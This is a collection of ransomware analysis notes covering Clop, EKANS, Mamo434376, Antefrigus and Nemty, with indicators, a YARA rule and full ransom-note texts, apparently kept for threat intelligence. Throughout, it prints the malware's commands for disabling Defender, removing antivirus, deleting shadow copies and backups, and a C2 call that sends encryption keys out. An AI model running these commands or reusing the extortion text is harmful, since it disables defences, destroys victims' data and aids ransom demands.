-------------------------------------------------------------------------------- 1 | # Clop ransomware 2 | 3 | ## SHA256 hashes 4 | - 6d115ae4c32d01a073185df95d3441d51065340ead1eada0efda6975214d1920 5 | - 6d8d5aac7ffda33caa1addcdc0d4e801de40cb437cf45cface5350710cde2a74 6 | - 70f42cc9fca43dc1fdfa584b37ecbc81761fb996cb358b6f569d734fa8cce4e3 7 | - a5f82f3ad0800bfb9d00a90770c852fb34c82ecb80627be2d950e198d0ad6e8b 8 | - 85b71784734705f6119cdb59b1122ce721895662a6d98bb01e82de7a4f37a188 (unpacked) 9 | 10 | ## References 11 | - https://twitter.com/demonslay335/status/1093917007379087360 12 | - https://twitter.com/GossiTheDog/status/1210588988265943046 13 | - https://twitter.com/0x10000000/status/1103607518184390656 14 | - https://twitter.com/darb0ng/status/1210047075812954112 15 | - https://twitter.com/darb0ng/status/1199209654661738496 16 | - https://twitter.com/VK_Intel/status/1157742218549039105 17 | - https://twitter.com/VK_Intel/status/1162810558774747137 18 | - https://twitter.com/VK_Intel/status/1210067407806570496 19 | - https://www.bleepingcomputer.com/news/security/ransomware-hits-maastricht-university-all-systems-taken-down/ 20 | 21 | ## Targets 22 | - Maastricht University (UM) - The Netherlands 23 | 24 | ## Notes 25 | - TA505 26 | - Clop filemarker: `Clop^_-` 27 | - Ransom extension: `.clop` or `.CIop` 28 | - Ransom note: `ClopReadMe.txt` or `CIopReadMe.txt` (https://pastebin.com/rHQ8gzD9) 29 | - Ransom e-mails: 30 | ``` 31 | servicedigilogos@protonmail.com 32 | managersmaers@tutanota.com 33 | unlock@eqaltech.su 34 | unlock@royalmail.su 35 | unlock@goldenbay.su 36 | unlock@graylegion.su 37 | kensgilbomet@protonmail.com 38 | ``` 39 | - Using RSA 1024-bit public key 40 | - Then encrypts files with RC4 using 117 bytes of the public key 41 | - Other version uses `Mersenne Twister algorithm` 42 | - Tries to uninstall ESET AV by grepping ProductCode from `callback.log` file: 43 | ``` 44 | cmd.exe "/C MSIEXEC /x 'ESET ProductCode' /qb" 45 | ``` 46 | - Uninstalls MSC: 47 | ``` 48 | cmd.exe /C "C:\Program Files\Microsoft Security Client\Setup.exe" /x /s 49 | ``` 50 | - Other version checks for `MalwareBytes, Webroot, Panda` 51 | - Interesting API call: `OpenPrinterW(L"KJFk23983ruafbuyTHFNIO#wu", 0, 0);` 52 | - Signed with valid certificate 53 | - Check local language via GetKeyboardLayout against hardcoded list: `Georgian, Russian, Azerbaijan` 54 | 55 | ## AV evasion 56 | - Tries to disable Windows Defender 57 | ```text 58 | cmd.exe /C reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f 59 | cmd.exe /C reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f 60 | cmd.exe /C reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f 61 | cmd.exe /C reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f 62 | cmd.exe /C reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f 63 | cmd.exe /C reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f 64 | cmd.exe /C reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f 65 | cmd.exe /C reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpCloudBlockLevel" /t REG_DWORD /d "0" /f 66 | cmd.exe /C reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SpynetReporting" /t REG_DWORD /d "0" /f 67 | ``` 68 | - Tries to uninstall MalwareBytes 69 | ``` 70 | cmd.exe /c \"C:\\Program Files\\Malwarebytes\\Anti-Ransomware\\unins000.exe\" /verysilent /suppressmsgboxes /norestart 71 | ``` 72 | 73 | ## Seen resources: 74 | - RC_DATAMAKEMONEY 75 | - RC_DATABIGBACK 76 | 77 | ## Seen mutexes: 78 | - FFRRTTOOOTTPPWWZZZLLSS^_- 79 | - MakeMoneyFromAirEathWorld#666Go 80 | - BestChangeT0pMoney^_-666 81 | 82 | ## Ransom note: 83 | ```text 84 | Your network has been penetrated. 85 | All files on each host in the network have been encrypted with a strong algorithm. 86 | Backups were either encrypted or deleted or backup disks were formatted. 87 | Shadow copies also removed, so F8 or any other methods may damage encrypted data but not recover. 88 | We exclusively have decryption software for your situation 89 | No decryption software is available in the public. 90 | DO NOT RESET OR SHUTDOWN – files may be damaged. 91 | DO NOT RENAME OR MOVE the encrypted and readme files. 92 | DO NOT DELETE readme files. 93 | This may lead to the impossibility of recovery of the certain files. 94 | Photorec, RannohDecryptor etc. repair tools are useless and can destroy your files irreversibly. 95 | If you want to restore your files write to emails (contacts are at the bottom of the sheet) and attach 2-3 encrypted files 96 | (Less than 5 Mb each, non-archived and your files should not contain valuable information 97 | (Databases, backups, large excel sheets, etc.)). 98 | You will receive decrypted samples and our conditions how to get the decoder. 99 | 100 | Attention!!! 101 | Your warranty - decrypted samples. 102 | Do not rename encrypted files. 103 | Do not try to decrypt your data using third party software. 104 | We don`t need your files and your information. 105 | 106 | But after 2 weeks all your files and keys will be deleted automatically. 107 | Contact emails: 108 | servicedigilogos@protonmail.com 109 | or 110 | managersmaers@tutanota.com 111 | 112 | The final price depends on how fast you write to us. 113 | 114 | Clop 115 | ``` 116 | 117 | ## Yara rules 118 | ```yara 119 | rule clop_ov_carosig 120 | { 121 | meta: 122 | author = "Albert Zsigovits" 123 | family = "Clop ransomware" 124 | 125 | condition: 126 | new_file and (signatures matches /.*Clop.*/) 127 | } 128 | -------------------------------------------------------------------------------- /Ransomware/Snake.md: -------------------------------------------------------------------------------- 1 | ## SNAKE / EKANS ransomware 2 | 3 | ## Hashes 4 | - e5262db186c97bbe533f0a674b08ecdafa3798ea7bc17c705df526419c168b60 5 | 6 | ## References 7 | - https://www.bleepingcomputer.com/news/security/snake-ransomware-is-the-next-threat-targeting-business-networks/ 8 | - https://twitter.com/VK_Intel/status/1214333066245812224 9 | - https://github.com/sysopfb/open_mal_analysis_notes/blob/master/e5262db186c97bbe533f0a674b08ecdafa3798ea7bc17c705df526419c168b60.md 10 | 11 | ## Sandbox runs 12 | - https://app.any.run/tasks/040f5530-fe29-42d6-b312-e3d338449f51 13 | - https://www.vmray.com/analyses/e5262db186c9/report/overview.html 14 | - https://hybrid-analysis.com/sample/e5262db186c97bbe533f0a674b08ecdafa3798ea7bc17c705df526419c168b60?environmentId=100 15 | - https://analyze.intezer.com/#/files/e5262db186c97bbe533f0a674b08ecdafa3798ea7bc17c705df526419c168b60/sub/fb9e8d93-92a9-477f-87f5-24f5c7a653d5 16 | 17 | ## Notes 18 | - Ransom note: `Fix-Your-Files.txt` 19 | - Ransom note put into: `C:\Users\Public\Desktop` 20 | - Ransom e-mail: `bapcocrypt@ctemplar.com` 21 | - Go build ID: `"X6lNEpDhc_qgQl56x4du/fgVJOqLlPCCIekQhFnHL/rkxe6tXCg56Ez88otHrz/Y-lXW-OhiIbzg3-ioGRz"` 22 | - Filemarker: `EKANS` 23 | - Mutex: `Global\EKANS` 24 | - Deletes shadow copies via: `SELECT * FROM Win32_ShadowCopy` 25 | - It appends a random 5 char string to the encrypted files' extension. `secret.pdf` becomes `secret.pdfbNcKl` 26 | 27 | ## RSA key: 28 | ``` 29 | -----BEGIN RSA PUBLIC KEY----- 30 | MIIBCgKCAQEAyQ+M5ve829umuy9+BSsUX/krgdF83L3m8/uxRvKX5EZbSh1+buON 31 | ZYr5MjfhrdiOGnrbB1j0Fy31U/uzvWcy7VvK/zcsO/5aAhujhHB/qMAVpZ8zT5BB 32 | ujT1Bvsith/BXgtM99MixD8oZ67VDZaRM9TPE89WuAjnaBZORrk48wFcn1DOAAHD 33 | Z9z9komtqIH1fm3Y0Q6P76nUscLsYOme082L217Th/lTMoqqs4cF2rn9O9Vp4V9U 34 | aCs4XVxGSpcuqbIscfpf0cm44P2eOEk+sbZdahO9C6fezt7YF4OCJ4Vz3qqMD6z4 35 | +6d7FRxUu6k3Te2T2bWBZnsDO30pYFi/gwIDAQAB 36 | -----END RSA PUBLIC KEY----- 37 | ``` 38 | 39 | ## Sample encrypted file 40 | - FileName 41 | - IV 42 | - ENCRYPTED_AES_Key 43 | 44 | ```byte 45 | a(`..g.ú.w.û~¸¶. 46 | Ùä7U.F..Lÿ.....n 47 | odceikemblegmpmk 48 | clo.ÿ......FileN 49 | ame.....IV.....E 50 | NCRYPTED_AES_Key 51 | .....þ.*ÿ...C:\a 52 | utoexec.bat 53 | ``` 54 | 55 | ## Skips encrypting the following locations 56 | - windir 57 | - SystemDrive 58 | - :\$Recycle.Bin 59 | - :\ProgramData 60 | - :\Users\All Users 61 | - :\Program Files 62 | - :\Local Settings 63 | - :\Boot 64 | - :\System Volume Information 65 | - :\Recovery 66 | - \AppData\ 67 | 68 | ## Ransom note 69 | ```text 70 | -------------------------------------------- 71 | | What happened to your files? 72 | -------------------------------------------- 73 | 74 | We breached your corporate network and encrypted the data on your computers. The encrypted data includes documents, databases, photos and more - all were encrypted using a military grade encryption algorithms (AES-256 and RSA-2048). You cannot access those files right now. But dont worry! 75 | 76 | You can still get those files back and be up and running again in no time. 77 | 78 | --------------------------------------------- 79 | | How to contact us to get your files back? 80 | --------------------------------------------- 81 | 82 | The only way to restore your files is by purchasing a decryption tool loaded with a private key we created specifically for your network. 83 | 84 | Once run on an effected computer, the tool will decrypt all encrypted files - and you can resume day-to-day operations, preferably with better cyber security in mind. If you are interested in purchasing the decryption tool contact us at bapcocrypt@ctemplar.com 85 | 86 | ------------------------------------------------------- 87 | | How can you be certain we have the decryption tool? 88 | ------------------------------------------------------- 89 | 90 | In your mail to us attach up to 3 files (up to 3MB, no databases or spreadsheets). 91 | 92 | We will send them back to you decrypted. 93 | ``` 94 | 95 | ## Blacklisted extensions and files: 96 | ``` 97 | .docx 98 | .dll 99 | .exe 100 | .sys 101 | .mui 102 | .tmp 103 | .lnk 104 | .config 105 | .manifest 106 | .tlb 107 | .olb 108 | .blf 109 | .ico 110 | .regtrans-ms 111 | .devicemetadata-ms 112 | .settingcontent-ms 113 | .bat 114 | .cmd 115 | .ps1 116 | desktop.ini 117 | iconcache.db 118 | ntuser.dat 119 | ntuser.ini 120 | ntuser.dat.log1 121 | ntuser.dat.log2 122 | usrclass.dat 123 | usrclass.dat.log1 124 | usrclass.dat.log2 125 | bootmgr 126 | bootnxt 127 | ntldr 128 | NTDETECT.COM 129 | boot.ini 130 | bootfont.bin 131 | bootsect.bak 132 | desktop.ini 133 | ctfmon.exe 134 | iconcache.db 135 | ntuser.dat 136 | ntuser.dat.log 137 | ntuser.ini 138 | thumbs.db 139 | ``` 140 | 141 | ## Taskkill list: 142 | ``` 143 | ccflic0.exe 144 | ccflic4.exe 145 | healthservice.exe 146 | ilicensesvc.exe 147 | nimbus.exe 148 | prlicensemgr.exe 149 | certificateprovider.exe 150 | proficypublisherservice.exe 151 | proficysts.exe 152 | erlsrv.exe 153 | vmtoolsd.exe 154 | managementagenthost.exe 155 | vgauthservice.exe 156 | epmd.exe 157 | hasplmv.exe 158 | spooler.exe 159 | hdb.exe 160 | ntservices.exe 161 | n.exe 162 | monitoringhost.exe 163 | win32sysinfo.exe 164 | inet_gethost.exe 165 | taskhostw.exe 166 | proficy administrator.exe 167 | ntevl.exe 168 | prproficymgr.exe 169 | prrds.exe 170 | prrouter.exe 171 | prconfigmgr.exe 172 | prgateway.exe 173 | premailengine.exe 174 | pralarmmgr.exe 175 | prftpengine.exe 176 | prcalculationmgr.exe 177 | prprintserver.exe 178 | prdatabasemgr.exe 179 | preventmgr.exe 180 | prreader.exe 181 | prwriter.exe 182 | prsummarymgr.exe 183 | prstubber.exe 184 | prschedulemgr.exe 185 | cdm.exe 186 | musnotificationux.exe 187 | npmdagent.exe 188 | client64.exe 189 | keysvc.exe 190 | server_eventlog.exe 191 | proficyserver.exe 192 | server_runtime.exe 193 | config_api_service.exe 194 | fnplicensingservice.exe 195 | workflowresttest.exe 196 | proficyclient.exe 197 | vmacthlp.exe 198 | msdtssrvr.exe 199 | sqlservr.exe 200 | msmdsrv.exe 201 | reportingservicesservice.exe 202 | dsmcsvc.exe 203 | winvnc4.exe 204 | client.exe 205 | collwrap.exe 206 | bluestripecollector.exe 207 | ``` -------------------------------------------------------------------------------- /Ransomware/Mamo434376.md: -------------------------------------------------------------------------------- 1 | ## Mamo434376 ransomware 2 | 3 | Might be related to other families: 4 | #MZREVENGE #KesLan #Deniz_Kızı 5 | 6 | ## SHA256 7 | - 24f5482541a024aa9655ee3a97481ec9ccdb660c037820159eb6992f2d0d72cb 8 | - 2dd6ab3f09ce00e4aca8099a205fd0633c5e3bf68a4ba64b860f2635ace82596 9 | - 2f61146c39b7838f741fcd769845191c9c3bf711fc72272125efbe4784c561b3 10 | - 4f7b4920df5e49893b2561dae65abbe3f6413993fb1d4bb0b9da1c28fcae1726 11 | - 83990eb15a86afd9de81534b3ed6d25cb0b5e26c16eb74d34b33106fb3b26bf3 12 | - 8b615646e5707e5b59fe3151d5a00839db8c9fe5ac3d2cab4d95e94d16a40ba4 13 | - c30ae67421647f8be7f8b61398ebdfc37c16a4be0760319980fcb1fc779fe4a8 14 | - dc5355924d19880cb834c8ca3894cffb0dde8005523bd4003bbc5c8ffc421967 15 | - f4a17ec97290cb0bb081308bbb94bb918a7b5d91a3b3ecc513a389b4f87e09e7 16 | 17 | ## VT perks: 18 | - `resource:"d283a8a3b073709f55ea1fd65720b57c3ddc0d4e25210b42845e6c03632ceadb"` (ransom note) 19 | - `C:\Users\Casper\Desktop\0xf4\0xf4\obj\Release\0xf4.pdb` (PDB) 20 | 21 | ## Encrypted extension 22 | ``` 23 | .TRSomware[is_back__New-Algorithm__By_MaMo434376] 24 | ``` 25 | 26 | ### Ransom notefile 27 | ``` 28 | Beni Oku!!!.txt 29 | ``` 30 | 31 | ## Ransom e-mails 32 | ``` 33 | yardimail1@aol.com 34 | yardimail2@aol.com 35 | ``` 36 | Both e-mails use the same backup phone: `05** *** ** 97` 37 | 38 | ## Seen PDBs 39 | ``` 40 | C:\Users\Casper\Desktop\0xf4\0xf4\obj\Release\0xf4.pdb 41 | ``` 42 | 43 | ## C2 44 | ``` 45 | random = abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 46 | string text = Form1.RandomString(150); 47 | string text2 = Form1.RandomString(12); 48 | new WebClient().DownloadString("http://zaammmama.tk/SHwLFOP19dHNKMSJ2mXhN92ZcpOcAEz.php?vIrMpaVbm86WzXjtcxEsw4YQ1Syo0B9NvOSuTlKNTsD9ksoe3Y2QTKSWC9sr=ID:_" + text2 + "___Key:___" + text); 49 | ``` 50 | 51 | ## Creates new host file (not hosts) 52 | ``` 53 | File.Delete("C:\\Windows\\System32\\drivers\\etc\\host"); 54 | Form1.createtextfilse("C:\\Windows\\System32\\drivers\\etc\\host", "127.0.0.1 validation.sls.microsoft.com"); 55 | ``` 56 | 57 | ## Disables Windows Task Manager 58 | ``` 59 | registryKey.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System"); 60 | registryKey.SetValue("DisableTaskMgr", "1"); 61 | ``` 62 | 63 | ## Executed OS commands 64 | ``` 65 | netsh firewall set opmode disable 66 | vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB 67 | vssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded 68 | vssadmin delete shadows /all /quiet 69 | wmic shadowcopy delete 70 | bcdedit /set {default} bootstatuspolicy ignoreallfailures 71 | bcdedit /set {default} recoveryenabled no 72 | wbadmin delete catalog -quiet 73 | wbadmin delete systemstatebackup 74 | wbadmin delete systemstatebackup -keepversions:0 75 | wbadmin delete backup 76 | ``` 77 | 78 | ## Services stoplist 79 | ``` 80 | net stop DbxSvc 81 | net stop OracleXETNSListener 82 | net stop OracleServiceXE 83 | net stop AcrSch2Svc 84 | net stop AcronisAgent 85 | net stop Apache2.4 86 | net stop SQLWriter 87 | net stop MSSQL$SQLEXPRESS 88 | net stop MSSQLServerADHelper100 89 | net stop MongoDB 90 | net stop SQLAgent$SQLEXPRESS 91 | net stop SQLBrowser 92 | net stop CobianBackup11 93 | net stop cbVSCService11 94 | net stop QBCFMontorService 95 | net stop QBVSS 96 | ``` 97 | 98 | ## Task killlist 99 | ``` 100 | taskkill /f /im sql.* 101 | taskkill /f /im winword.* 102 | taskkill /f /im wordpad.* 103 | taskkill /f /im outlook.* 104 | taskkill /f /im thunderbird.* 105 | taskkill /f /im oracle.* 106 | taskkill /f /im excel.* 107 | taskkill /f /im onenote.* 108 | taskkill /f /im virtualboxvm.* 109 | taskkill /f /im node.* 110 | taskkill /f /im QBW32.* 111 | taskkill /f /im WBGX.* 112 | taskkill /f /im Teams.* 113 | taskkill /f /im Flow.* 114 | ``` 115 | 116 | ## Extension list to encrypt: 117 | ``` 118 | ".txt" 119 | ".doc" 120 | ".docx" 121 | ".rar" 122 | ".zip" 123 | ".xls" 124 | ".bin" 125 | ".xlsx" 126 | ".ppt" 127 | ".pptx" 128 | ".rtf" 129 | ".odt" 130 | ".jpg" 131 | ".png" 132 | ".csv" 133 | ".sql" 134 | ".mdb" 135 | ".sln" 136 | ".php" 137 | ".asp" 138 | ".aspx" 139 | ".html" 140 | ".xml" 141 | ".psd" 142 | ``` 143 | 144 | ## Ransom note 145 | ``` 146 | Merhaba! 147 | 148 | Sisteminizde önemli gördüğümüz datalarınızı şifreledik. Bilindik veri kurtarma yöntemleri ile verilerinizi geri getiremeyeceğinizi - 149 | bilmenizi isteriz. 150 | Bu yöntemler sadece sizin zaman kaybetmenize sebep olacaktır. 151 | Yinede veri kurtarma firmaları yada programları kullanmak isterseniz lütfen asıl dosyalarınız üzerinde değil, 152 | bunların kopyaları üzerinde işlem yapınız ve/veya yaptırınız. 153 | Asıl dosyaların bozulması verilerinizin geri dönülmez şekilde zarar görmesine sebep olabilir. 154 | Sifrelenen dosyalarınızın asılları, üzerinde rast gele veri yazma tekniğini kullanarak silinmiştir. 155 | 156 | 2 gün içerisinde dönüş yapılmadığı taktirde, sisteminizde kullanılan şifre silinecektir ve verileriniz asla geri döndürülmiyecektir. 157 | 158 | Diskleriniz Full disk encryption ile şifrelenmiştir yetkisiz müdahale kalici veri kaybına neden olur! 159 | 160 | Para verseniz daha açmazlar diyen bilgisayarcılara veya paranı alır dosyalarını vermez diyen - 161 | etrafınızdaki insanlara inanmayın. 162 | Size güven verecek kadar yeterli referansa sahibim. 163 | 164 | Sizi tanımıyorum, dolaysıyla ile size karşı kötü duygular beslemenin size kötülük yapmanın bir anlamı"da yok, 165 | amacım sadece bu işten bir gelir elde etmek. 166 | Ödeme Bitcoin ile yapılmaktadır. 167 | Bitcoin ne olduğunu buradan öğrenebilirsiniz : https://simple.wikipedia.org/wiki/Bitcoin 168 | Yaptığınız ödeme sonrasında, en kısa zamanda verilerinizi eski haline döndürmek için size özel bir şifre çözücü yapacağım - 169 | ve mail yoluyla size göndereceğim, ama tabi bunun için mail yoluyla bizimle iletişime geçmeniz ve bize ID"nizi göndermeniz gerekir. 170 | 171 | Şifre çözme aracının fiyatı 300 dolar. 172 | 24 saat içerisinde dönüş yaparsanız size %50 indirim yapacağım. 173 | 174 | Ödemeyi yapmak ve verilerinizin şifresini çözdürmek için aşağıdaki iletişim kanalından bizimle iletişime geçebilirsiniz. 175 | 176 | Ulaşmak istediğinizde mutlaka aşağıda size özel üretilen ID"yi eklemeyi unutmayınız. 177 | 178 | SITE_CODE: 179 | ID: XXXXXXXXXX 180 | E-Mail: yardimail1@aol.com 181 | ``` 182 | -------------------------------------------------------------------------------- /Ransomware/Antefrigus.md: -------------------------------------------------------------------------------- 1 | # Antefrigus ransomware 2 | 3 | ## SHA256 hashes 4 | - 3cb061bd1c9326ec12d3b5f540d425730245472b72e5295f52b53b82ea03cb68 5 | - b90683251727a6e1e4e846adf7fa29a8dbfba0874cfedcd8a798239130d6c058 6 | 7 | ## References 8 | - https://www.bleepingcomputer.com/news/security/strange-antefrigus-ransomware-only-targets-specific-drives/ 9 | - https://id-ransomware.blogspot.com/2019/11/antefrigus-ransomware.html 10 | - https://twitter.com/malwrhunterteam/status/1195335031633432577 11 | - https://twitter.com/Amigo_A_/status/1195051403888267264 12 | - https://twitter.com/GrujaRS/status/1194692806083796993 13 | - https://twitter.com/VK_Intel/status/1216792575807541249 14 | 15 | ## Notes 16 | - Demanding a ransom of `1995 USD` in BTC, which doubles when it is not paid within four days and five hours, adding up `3990 USD` in BTC 17 | - Encrypts D:, E:, F:, G:, H:, and I: drives, but interestingly not C: 18 | - Drops a file to `C:\qweasd\test.txt`, in one case with a content: `5823142135788270` 19 | - Check in to `http://iplogger.org/10UJ73` 20 | - Appends a random character extension to encrypted files 21 | - The ransom note: `[extension]-readme.txt`, placed in `C:\Instraction` folder and on the `Desktop` 22 | - Deletes shadow copies via `wmic.exe shadowcopy delete` 23 | - Creates DirectXII.dll file, in one case with a content: `1823673412070204` 24 | - Creates DirectX1I.dll file, in one case with a content: `oqvfhnqo` 25 | 26 | ## Extension list 27 | ``` 28 | dll, adv, ani, big, bat, bin, cab, cmd, com, cpl, cur 29 | deskthemepack, diagcab, diagcfg, diagpkg, drv, exe, hlp 30 | icl, icns, ico, ics, idx, ldf, lnk, mod, mpa, msc, msp 31 | msstyles, msu, nls, nomedia, ocx, prf, rom, rtp, scr, shs 32 | spl, sys, theme, themepack, wpx, lock, key, hta, msi, pck 33 | ``` 34 | 35 | ## Folder exclusion list 36 | - C:/windows 37 | - C:/Windows 38 | - C:/intel 39 | - C:/nvidia 40 | - C:/ProgramData 41 | - C:/Program Files 42 | - C:/Program Files (x86) 43 | 44 | ## Task killist 45 | ``` 46 | taskkill /F /IM aupis80.exe 47 | taskkill /F /IM sql.exe 48 | taskkill /F /IM oracle.exe 49 | taskkill /F /IM ocssd.exe 50 | taskkill /F /IM dbsnmp.exe 51 | taskkill /F /IM synctime.exe 52 | taskkill /F /IM agntsvc.exe 53 | taskkill /F /IM isqlplussvc.exe 54 | taskkill /F /IM xfssvccon.exe 55 | taskkill /F /IM mydesktopservice.exe 56 | taskkill /F /IM ocautoupds.exe 57 | taskkill /F /IM encsvc.exe 58 | taskkill /F /IM tbirdconfig.exe 59 | taskkill /F /IM mydesktopqos.exe 60 | taskkill /F /IM ocomm.exe 61 | taskkill /F /IM dbeng50.exe 62 | taskkill /F /IM sqbcoreservice.exe 63 | taskkill /F /IM excel.exe 64 | taskkill /F /IM infopath.exe 65 | taskkill /F /IM msaccess.exe 66 | taskkill /F /IM mspub.exe 67 | taskkill /F /IM onenote.exe 68 | taskkill /F /IM outlook.exe 69 | taskkill /F /IM powerpnt.exe 70 | taskkill /F /IM steam.exe 71 | taskkill /F /IM thebat.exe 72 | taskkill /F /IM thunderbird.exe 73 | taskkill /F /IM visio.exe 74 | taskkill /F /IM winword.exe 75 | taskkill /F /IM wordpad.exe 76 | ``` 77 | 78 | ## TOR gate 79 | ``` 80 | yboa7nidpv5jdtumgfm4fmmvju3ccxlleut2xvzgn5uqlbjd5n7p3kid.onion 81 | ``` 82 | 83 | ## C2 uri params: 84 | ``` 85 | add_outstuk.php?name=[NAME]&pcName=[PCNAME]&key=[KEY]&memory=[MEMORY] 86 | ``` 87 | 88 | ## Ransom e-mails 89 | - antefrigus@cock.li 90 | 91 | ## PDB 92 | ``` 93 | G:\sever\Scan\crypro\rijndael_simd.cpp 94 | G:\sever\Scan\crypro\sha_simd.cpp 95 | G:\sever\Scan\crypro\sse_simd.cpp 96 | ``` 97 | 98 | ## Ransom notes 99 | ``` 100 | $$$$ $$ $$ $$$$$$ $$$$$ $$$$$$ $$$$$ $$$$$$ $$$$ $$ $$ $$$$ 101 | $$ $$ $$$ $$ $$ $$ $$ $$ $$ $$ $$ $$ $$ $$ 102 | $$$$$$ $$ $$$ $$ $$$$ $$$$ $$$$$ $$ $$ $$$ $$ $$ $$$$ 103 | $$ $$ $$ $$ $$ $$ $$ $$ $$ $$ $$ $$ $$ $$ $$ 104 | $$ $$ $$ $$ $$ $$$$$ $$ $$ $$ $$$$$$ $$$$ $$$$ $$$$ 105 | 106 | [+] Whats Happen ? [+] 107 | Your files are encrypted, and currently unavailable.You can check it : all files on you computer has expansion hssjyh. 108 | By the way, everything is possible to recover(restore), but you need to follow our instructions.Otherwise, you cant return your data(NEVER). 109 | [+] What guarantees ? [+] 110 | Its just a business.We absolutely do not care about youand your deals, except getting benefits.If we do not do our workand liabilities - nobody will not cooperate with us.Its not in our interests. 111 | To check the ability of returning files, You should go to our website.There you can decrypt one file for free.That is our guarantee. 112 | If you will not cooperate with our service - for us, its does not matter.But you will lose your timeand data, cause just we have the private key.In practise - time is much more valuable than money. 113 | [+] How to get access on website ? [+] 114 | You have two ways : 115 | 1)[Recommended] Using a TOR browser! 116 | a) Download and install TOR browser from this site: https://torproject.org/ 117 | b) Open our website : http://yboa7nidpv5jdtumgfm4fmmvju3ccxlleut2xvzgn5uqlbjd5n7p3kid.onion/?hssjyh 118 | (If you can’t follow the link or other difficulty write to the technical support email : antefrigus@cock.li) 119 | 2) If TOR blocked in your country, try to use VPN! For this: 120 | a) Open any browser (Chrome, Firefox, Opera, IE, Edge) and download and install free VPN programm and download TOR browser from this site https://torproject.org/ 121 | b) If you are having difficulty purchase bitcoins, or you doubt in buying decryptor, contact to any data recovery company in your country, they will give you more guarantees and take purchase and decryption procedure on themselves. Almost all such companies heared about us and know that our decryption program work, so they can help you. 122 | When you open our website, put the following data in the input form: 123 | Key: 124 | 125 | Extension name : 126 | hssjyh 127 | ---------------------------------------------------------------------------------------- - 128 | !!!DANGER !!! 129 | DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private keyand, as result, The Loss all data. 130 | !!!!!!!!! 131 | ONE MORE TIME : Its in your interests to get your files back.From our side, we(the best specialists) make everything for restoring, but please should not interfere. 132 | !!!!!!!!! 133 | ``` -------------------------------------------------------------------------------- /Ransomware/Nemty.md: -------------------------------------------------------------------------------- 1 | ## Nemty ransomware 2 | 3 | ## Hashes 4 | - 1d3f2ba1c701ecf04c288b64d9f2470c6f58744d5284174c1cb8e8b3753f3fae 5 | - a127323192abed93aed53648d03ca84de3b5b006b641033eb46a520b7a3c16fc 6 | 7 | ## References 8 | - https://www.tesorion.nl/nemty-2-2-and-2-3-analysis-of-their-cryptography-and-a-decryptor-for-some-file-types/ 9 | - https://www.tesorion.nl/bug-in-nemty-corrupting-the-encryption-of-large-files/ 10 | - https://id-ransomware.blogspot.com/2019/08/nemty-ransomware.html 11 | - https://twitter.com/Damian1338/status/1165584237132767242 12 | - https://twitter.com/VK_Intel/status/1214285648036859904 13 | - https://twitter.com/GrujaRS/status/1214206837500841984 14 | - https://twitter.com/GrujaRS/status/1206560801139707906 15 | - https://twitter.com/VK_Intel/status/1202858798672728064 16 | - https://twitter.com/VK_Intel/status/1207769130130182147 17 | - https://twitter.com/GrujaRS/status/1201245856801992705 18 | - https://twitter.com/demonslay335/status/1188880199674408961 19 | - https://twitter.com/VK_Intel/status/1170785426875064325 20 | - https://twitter.com/VK_Intel/status/1171065977066393600 21 | - https://www.acronis.com/en-us/blog/posts/threat-analysis-nemty-ransomware-and-fake-paypal-site 22 | - https://www.optiv.com/blog/nemty-ransomware-deployed-payment-service-phish 23 | - https://www.fortinet.com/blog/threat-research/nemty-ransomware-early-stage-threat.html 24 | 25 | ## Versions seen 26 | - Nemty 1.0 27 | - Nemty 1.4 28 | - Nemty 1.6 29 | - Nemty 2.0 30 | - Nemty 2.2 31 | - Nemty 2.3 32 | - Nemty 2.5 33 | 34 | ## Ransom e-mails 35 | - elzmflqxj@tutanota.de 36 | - helpdesk_nemty@aol.com 37 | 38 | ## Backup phone number 39 | - 09** *** **05 40 | 41 | ## Nemty gates 42 | ``` 43 | nemty.hk 44 | nemty10.hk 45 | nemty.top 46 | nemty.top/public/pay.php 47 | zjoxyw5mkacojk5ptn2iprkivg5clow72mjkyk5ttubzxprjjnwapkad.onion/pay 48 | ``` 49 | 50 | ## Error message on C2 gate 51 | ``` 52 | Fatal error: Uncaught [23000] - SQLSTATE[23000]: Integrity constraint violation: 1048 Column 'rsakey' cannot be null trace: #0 C:\OSPanel\domains\localhost\func\rb.php(882): RedBeanPHP\Driver\RPDO->runQuery('INSERT INTO `bo...', Array) #1 C:\OSPanel\domains\localhost\func\rb.php(919): RedBeanPHP\Driver\RPDO->GetAll('INSERT INTO `bo...', Array) #2 C:\OSPanel\domains\localhost\func\rb.php(3547): RedBeanPHP\Driver\RPDO->GetOne('INSERT INTO `bo...', Array) #3 C:\OSPanel\domains\localhost\func\rb.php(4976): RedBeanPHP\Adapter\DBAdapter->getCell('INSERT INTO `bo...', Array, 0) #4 C:\OSPanel\domains\localhost\func\rb.php(5103): RedBeanPHP\QueryWriter\AQueryWriter->insertRecord('bots', Array, Array) #5 C:\OSPanel\domains\localhost\func\rb.php(7646): RedBeanPHP\QueryWriter\AQueryWriter->updateRecord('bots', Array, 0) #6 C:\OSPanel\domains\localhost\func\rb.php(7233): RedBeanPHP\Repository\Fluid->storeBean(Object(RedBeanPHP\OODBBean)) #7 C:\OSPanel\domains\localhost\func\rb.php(8310): RedBeanPHP\Repository->store(Object(RedBeanPHP\ in C:\OSPanel\domains\localhost\func\rb.php on line 720 53 | ``` 54 